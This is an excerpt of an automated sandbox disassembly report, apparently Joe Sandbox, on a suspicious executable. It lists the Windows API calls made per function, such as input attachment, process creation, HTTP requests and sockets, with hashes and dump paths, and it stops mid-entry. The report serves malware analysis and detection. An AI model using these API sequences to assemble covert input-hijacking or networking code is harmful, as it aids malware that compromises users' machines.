                                • Instruction ID: 84bf351f77bc9d2f907a231a7cca5d59d5d4833ea104eba08de3c348cfd5c6fe
                                • Opcode Fuzzy Hash: 467a645887d104cc25b9efd051b086f813e81eb46b0a89aff6e7140bf77ec211
                                • Instruction Fuzzy Hash: D1219071940208BFDF00ABA4CCC9FFEB7A9EF49300F100515F562A71E1DB759959AB20
                                APIs
                                • GetParent.USER32 ref: 00C9C8D9
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00C9C8EE
                                • _wcscmp.LIBCMT ref: 00C9C900
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C9C97B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClassMessageNameParentSend_wcscmp
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 1704125052-3381328864
                                • Opcode ID: 9747c662592b2a5d594749103ae2278411e5c7391d6c13b5ee9997b6d4c722f6
                                • Instruction ID: ce358be34cc35d1840209df527ecb871f46883328d8f2a953c61bc9d15c25c9a
                                • Opcode Fuzzy Hash: 9747c662592b2a5d594749103ae2278411e5c7391d6c13b5ee9997b6d4c722f6
                                • Instruction Fuzzy Hash: F711C676648342BEFE043B31EC8EDBA77DCDF06764B210012F921E90D2FF6269625664
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CBB777
                                • CoInitialize.OLE32(00000000), ref: 00CBB7A4
                                • CoUninitialize.OLE32 ref: 00CBB7AE
                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00CBB8AE
                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CBB9DB
                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00CBBA0F
                                • CoGetObject.OLE32(?,00000000,00CED91C,?), ref: 00CBBA32
                                • SetErrorMode.KERNEL32(00000000), ref: 00CBBA45
                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CBBAC5
                                • VariantClear.OLEAUT32(00CED91C), ref: 00CBBAD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                • String ID:
                                • API String ID: 2395222682-0
                                • Opcode ID: 2222241d8cd8e81f3e6cc033d778faba6e887b6a4ac5807d4f8cb7aa35a0b0a0
                                • Instruction ID: 62ec3827806daa65c0d6caa44d2bef49a7fe456c63de71c891f00d93291bb8e2
                                • Opcode Fuzzy Hash: 2222241d8cd8e81f3e6cc033d778faba6e887b6a4ac5807d4f8cb7aa35a0b0a0
                                • Instruction Fuzzy Hash: A1C12471608345AFC700DF69C884A6BB7E9FF88304F04495DF59A9B251DB71ED05CB92
                                APIs
                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CAB137
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ArraySafeVartype
                                • String ID:
                                • API String ID: 1725837607-0
                                • Opcode ID: f4aff5c91b79cda909ea75a629396845bfd08ea37cbecf8ecdf7dfc9b1a0bb69
                                • Instruction ID: c527cc96cc8559f967b194b395aa02701dbf7acf95c8fa2aaf5aa5cffb513a0e
                                • Opcode Fuzzy Hash: f4aff5c91b79cda909ea75a629396845bfd08ea37cbecf8ecdf7dfc9b1a0bb69
                                • Instruction Fuzzy Hash: 60C1827590121ADFDB00CF98D495BAEB7F4FF0A319F20406AE615EB252C734AE81DB90
                                APIs
                                • __lock.LIBCMT ref: 00C8BA74
                                  • Part of subcall function 00C88984: __mtinitlocknum.LIBCMT ref: 00C88996
                                  • Part of subcall function 00C88984: EnterCriticalSection.KERNEL32(00C80127,?,00C8876D,0000000D), ref: 00C889AF
                                • __calloc_crt.LIBCMT ref: 00C8BA85
                                  • Part of subcall function 00C87616: __calloc_impl.LIBCMT ref: 00C87625
                                  • Part of subcall function 00C87616: Sleep.KERNEL32(00000000,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8763C
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C8BAA0
                                • GetStartupInfoW.KERNEL32(?,00D16990,00000064,00C86B14,00D167D8,00000014), ref: 00C8BAF9
                                • __calloc_crt.LIBCMT ref: 00C8BB44
                                • GetFileType.KERNEL32(00000001), ref: 00C8BB8B
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C8BBC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                • String ID:
                                • API String ID: 1426640281-0
                                • Opcode ID: a6f334cc6a3d397be5341050ac96f79a19aa9ab39b6b68cc2ac098ca90d3aea4
                                • Instruction ID: 9e7c9b69aeb89713901122ccb1e4edacef97119255ca2d53ea093cd679abb33f
                                • Opcode Fuzzy Hash: a6f334cc6a3d397be5341050ac96f79a19aa9ab39b6b68cc2ac098ca90d3aea4
                                • Instruction Fuzzy Hash: 1281D4709047458FDB24EF68C8806ADBBF0AF59328B24425DD4B6AB3D1DB349D43DB68
                                APIs
                                • __swprintf.LIBCMT ref: 00CA7226
                                • __swprintf.LIBCMT ref: 00CA7233
                                  • Part of subcall function 00C8234B: __woutput_l.LIBCMT ref: 00C823A4
                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CA725D
                                • LoadResource.KERNEL32(?,00000000), ref: 00CA7269
                                • LockResource.KERNEL32(00000000), ref: 00CA7276
                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00CA7296
                                • LoadResource.KERNEL32(?,00000000), ref: 00CA72A8
                                • SizeofResource.KERNEL32(?,00000000), ref: 00CA72B7
                                • LockResource.KERNEL32(?), ref: 00CA72C3
                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CA7322
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                • String ID:
                                • API String ID: 1433390588-0
                                • Opcode ID: bb7ade678b6f54c0ce1f7e33e57a8a8b70e7121340117bdad3f05aeab7d82c85
                                • Instruction ID: 9e986a3cc3ed30954bf99913ba0dec37c95ee19425a5d6b88b3f508a77b77456
                                • Opcode Fuzzy Hash: bb7ade678b6f54c0ce1f7e33e57a8a8b70e7121340117bdad3f05aeab7d82c85
                                • Instruction Fuzzy Hash: 9E31AEB190525BABDF119F609C88BAF7BACFF05304B004625FD12D6160E734DA51DBB0
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00CA4A7D
                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4A91
                                • GetWindowThreadProcessId.USER32(00000000), ref: 00CA4A98
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AA7
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA4AB9
                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AD2
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AE4
                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B29
                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B3E
                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B49
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 0cfb198c2b6a1f414c1a1169d2fc16865ea0dee0c06ceabe6f9053750f714ea5
                                • Instruction ID: b6ed39984c45881b4b813937fd0b7d557e2875ee3bd35d2b67a4a18c49c01f9c
                                • Opcode Fuzzy Hash: 0cfb198c2b6a1f414c1a1169d2fc16865ea0dee0c06ceabe6f9053750f714ea5
                                • Instruction Fuzzy Hash: FB31BD71600706EFDB249B14EC88B6EB7AEABA2316F114505F915CB2A0D3F8DE458B70
                                APIs
                                • GetClientRect.USER32(?), ref: 00CDEC32
                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00CDEC49
                                • GetWindowDC.USER32(?), ref: 00CDEC55
                                • GetPixel.GDI32(00000000,?,?), ref: 00CDEC64
                                • ReleaseDC.USER32(?,00000000), ref: 00CDEC76
                                • GetSysColor.USER32(00000005), ref: 00CDEC94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                • String ID:
                                • API String ID: 272304278-0
                                • Opcode ID: 43e64a09254ed521ded5f94db75a25b590077305e3497cfb5cc3111ebad9af75
                                • Instruction ID: 0f99ad86c394b0468ad9210504009e6928012013485d789fd619bff1139aa06c
                                • Opcode Fuzzy Hash: 43e64a09254ed521ded5f94db75a25b590077305e3497cfb5cc3111ebad9af75
                                • Instruction Fuzzy Hash: 0E212C71500245EFDB21AB64EC89BAE7B75FB45321F108265FA2BA91E1DB310E41DF21
                                APIs
                                • EnumChildWindows.USER32(?,00C9DD46), ref: 00C9DC86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ChildEnumWindows
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                • API String ID: 3555792229-1603158881
                                • Opcode ID: 0668f4b555f8e868076201d5b4ff0df5374c4aa71b18c6a27bd1fd5c9ed9a52b
                                • Instruction ID: 6c032f38fedbb76245afa37a370507514d30fa3954e9974cc576462e0aebde5c
                                • Opcode Fuzzy Hash: 0668f4b555f8e868076201d5b4ff0df5374c4aa71b18c6a27bd1fd5c9ed9a52b
                                • Instruction Fuzzy Hash: 4E91A370A00506ABCF08EF64C4C5BE9FB75BF05350F548119E85BB7291DF306A9AEBA1
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C645F0
                                • CoUninitialize.OLE32(?,00000000), ref: 00C64695
                                • UnregisterHotKey.USER32(?), ref: 00C647BD
                                • DestroyWindow.USER32(?), ref: 00CD5936
                                • FreeLibrary.KERNEL32(?), ref: 00CD599D
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD59CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                • String ID: close all
                                • API String ID: 469580280-3243417748
                                • Opcode ID: 5535d59f7864c7e1a9d68babef027e299fb376e9c553bc07fc74134d47fba9af
                                • Instruction ID: ed1a9f4d614e6f634151059dc896aa220f08703a1003eed9acb5272972721657
                                • Opcode Fuzzy Hash: 5535d59f7864c7e1a9d68babef027e299fb376e9c553bc07fc74134d47fba9af
                                • Instruction Fuzzy Hash: 56911934600602DFC729EF24C8E5B68F3A4FF15715F6042A9E51AA7262DB30AE66DF14
                                APIs
                                • SetWindowLongW.USER32(?,000000EB), ref: 00C7C2D2
                                  • Part of subcall function 00C7C697: GetClientRect.USER32(?,?), ref: 00C7C6C0
                                  • Part of subcall function 00C7C697: GetWindowRect.USER32(?,?), ref: 00C7C701
                                  • Part of subcall function 00C7C697: ScreenToClient.USER32(?,?), ref: 00C7C729
                                • GetDC.USER32 ref: 00CDE006
                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CDE019
                                • SelectObject.GDI32(00000000,00000000), ref: 00CDE027
                                • SelectObject.GDI32(00000000,00000000), ref: 00CDE03C
                                • ReleaseDC.USER32(?,00000000), ref: 00CDE044
                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CDE0CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                • String ID: U
                                • API String ID: 4009187628-3372436214
                                • Opcode ID: 15308053fe7118927250cfa153cec163c313ac128e691423f11e1a8c341a7ad1
                                • Instruction ID: a2b7aaa57aa01b53c214173b0f2240de56d04f32738a9bfc69cfaedc3b54e18e
                                • Opcode Fuzzy Hash: 15308053fe7118927250cfa153cec163c313ac128e691423f11e1a8c341a7ad1
                                • Instruction Fuzzy Hash: A371E631500205EFCF21AFA4CCC0AAE7BB5FF55350F14826AFE665A2A6C7319D41EB61
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                  • Part of subcall function 00C7B736: GetCursorPos.USER32(000000FF), ref: 00C7B749
                                  • Part of subcall function 00C7B736: ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000002), ref: 00C7B799
                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CCEB0E
                                • ImageList_EndDrag.COMCTL32 ref: 00CCEB14
                                • ReleaseCapture.USER32 ref: 00CCEB1A
                                • SetWindowTextW.USER32(?,00000000), ref: 00CCEBC2
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CCEBD5
                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CCECAE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                • API String ID: 1924731296-2107944366
                                • Opcode ID: ced4259ce4cef4c11431b05e5a59dced1ef72b102742a14e81277c58befcff19
                                • Instruction ID: 118425ef755120d8fa35525d2553f94daa074fc74b95424ae1545ac6dcbb8a09
                                • Opcode Fuzzy Hash: ced4259ce4cef4c11431b05e5a59dced1ef72b102742a14e81277c58befcff19
                                • Instruction Fuzzy Hash: A551CD74204304AFD714EF24DC96F6A7BE5FB98704F008A2DF596972E2CB709905EB62
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB4C5E
                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CB4C8A
                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CB4CCC
                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CB4CE1
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB4CEE
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CB4D1E
                                • InternetCloseHandle.WININET(00000000), ref: 00CB4D65
                                  • Part of subcall function 00CB56A9: GetLastError.KERNEL32(?,?,00CB4A2B,00000000,00000000,00000001), ref: 00CB56BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                • String ID:
                                • API String ID: 1241431887-3916222277
                                • Opcode ID: b9532930898c01346c35a76ec0dc7a3caf9b7af86a2abc67ece5098b4cc2fd41
                                • Instruction ID: 1bde23bcd609b7665d66e680a125d0aea5d79173b8f5c768f97c46c1a008b85e
                                • Opcode Fuzzy Hash: b9532930898c01346c35a76ec0dc7a3caf9b7af86a2abc67ece5098b4cc2fd41
                                • Instruction Fuzzy Hash: A1419DB1505618BFEB169F60CC89FFF7BACEF08714F10411AFA119A196DB709E449BA0
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CFDBF0), ref: 00CBBBA1
                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CFDBF0), ref: 00CBBBD5
                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CBBD33
                                • SysFreeString.OLEAUT32(?), ref: 00CBBD5D
                                • StringFromGUID2.OLE32(?,?,00000028,?,00CFDBF0), ref: 00CBBEAD
                                • ProgIDFromCLSID.OLE32(?,?,?,00CFDBF0), ref: 00CBBEF7
                                • CoTaskMemFree.OLE32(?,?,?,00CFDBF0), ref: 00CBBF14
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                • String ID:
                                • API String ID: 793797124-0
                                • Opcode ID: 949d563b21a3e14cf69df1f21554ade1aaeafa392c5a2b02802eb0b578affb79
                                • Instruction ID: 0b267f27db8fffbae46935d6bb181e793619e81a563bb0c6f6f18590055d34e3
                                • Opcode Fuzzy Hash: 949d563b21a3e14cf69df1f21554ade1aaeafa392c5a2b02802eb0b578affb79
                                • Instruction Fuzzy Hash: CAF10875A00109EFCB14DFA4C884EEEB7B9FF89314F108459F916AB251DB71AE42DB90
                                APIs
                                • _memset.LIBCMT ref: 00CC23E6
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CC2579
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CC259D
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CC25DD
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CC25FF
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CC2760
                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CC2792
                                • CloseHandle.KERNEL32(?), ref: 00CC27C1
                                • CloseHandle.KERNEL32(?), ref: 00CC2838
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                • String ID:
                                • API String ID: 4090791747-0
                                • Opcode ID: 173697e4db0052f2178023bb54b791202dcb6ad36468c35668e44f33291b5002
                                • Instruction ID: 0287b9a2c6010515682ed43f6982c57ba4344c5011cf3f5a8b031645b18755a4
                                • Opcode Fuzzy Hash: 173697e4db0052f2178023bb54b791202dcb6ad36468c35668e44f33291b5002
                                • Instruction Fuzzy Hash: 84D1AD31604301DFCB24EF24C891B6EBBE5AF85324F18845DF89A9B2A2DB31DD45DB52
                                APIs
                                • select.WSOCK32 ref: 00CB9B38
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9B45
                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00CB9B6F
                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CB9B90
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9B9F
                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00CB9C51
                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00CFDBF0), ref: 00CB9C0C
                                  • Part of subcall function 00C9E0F5: _strlen.LIBCMT ref: 00C9E0FF
                                  • Part of subcall function 00C9E0F5: _memmove.LIBCMT ref: 00C9E121
                                • _strlen.LIBCMT ref: 00CB9CA7
                                • _memmove.LIBCMT ref: 00CB9D10
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
